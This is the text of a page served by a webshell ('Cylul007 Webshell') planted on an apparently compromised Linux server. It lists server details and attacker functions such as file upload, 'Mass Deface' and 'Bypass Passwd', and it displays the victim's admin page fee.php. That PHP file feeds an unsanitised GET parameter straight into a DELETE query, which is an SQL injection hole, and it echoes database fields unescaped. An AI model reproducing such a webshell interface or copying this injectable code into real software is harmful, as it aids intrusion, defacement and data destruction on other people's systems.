Cylul007 Webshell
Server :
Linux ip-148-66-134-25.ip.secureserver.net 3.10.0-1160.119.1.el7.tuxcare.els10.x86_64 #1 SMP Fri Oct 11 21:40:41 UTC 2024 x86_64
php :
8.0.30
on
cgi-fcgi
Time
25 Nov 2024 20:44:53
Current Directory :
/
home
/
amvm
/
www
/
behakfattu
/
myadmin
/
Upload File :
Mass Deface
Home
Bypass Passwd
Current File : /home/amvm/www/behakfattu/myadmin/fee.php
<?php include('header.php');?> <!-- =============================================== --> <!-- Content Wrapper. Contains page content --> <div class="content-wrapper"> <!-- Content Header (Page header) --> <section class="content-header"> <h1> Fee Structure </h1> <ol class="breadcrumb"> <li><a href="#"><i class="fa fa-dashboard"></i> Home</a></li> <li><a href="#">fee</a></li> <li class="active">View</li> </ol> </section> <!-- Main content --> <div class="callout callout-info"> <h4>Tip!</h4> <p>This page will show you all the fee data upload by the user.</p> </div> <!-- Default box --> <?php $sql = "SELECT * FROM fee"; $result = mysqli_query($mysql_con, $sql); if (isset($_GET['delete_id'])){ $page_id = $_GET['delete_id']; $sql = "DELETE FROM fee WHERE id = '$page_id' "; $query = mysqli_query($mysql_con, $sql); header ('location: fee.php'); } ?> <!-- Main content --> <section class="content"> <div class="row"> <div class="col-xs-12"> <!-- /.box --> <div class="box"> <div class="box-header"> <h3 class="box-title">Data Table With Full Features</h3> </div> <!-- /.box-header --> <div class="box-body"> <table id="example1" class="table table-bordered table-striped"> <thead> <tr> <th>Sr.No.</th> <th>Fee Title</th> <th>Fee Detail</th> <th>Action</th> </tr> </thead> <tbody> <?php $sr_no = 1; while($row = mysqli_fetch_array($result)) {?> <tr> <td><?php echo $sr_no ; ?></td> <td><?php echo $row['title'] ; ?> </td> <td><?php echo $row['detail'] ; ?></td> <td> <a href="update-fee.php?edit_id=<?php echo $row["id"] ; ?> " class="btn btn-info">Edit</a><br> <a href="fee.php?delete_id=<?php echo $row["id"] ; ?> " class="btn btn-danger">Delete</a> </td> </tr> <?php $sr_no ++; }?> </tbody> </table> </div> <!-- /.box-body --> </div> <!-- /.box --> <!-- /.col --> </div> <!-- /.row --> </section> <!-- /.content --> </div> <!-- /.content-wrapper --> <?php include("footer.php"); ?>
./LuLlaby007 ♥ Tata Cantik - Copyright 2k18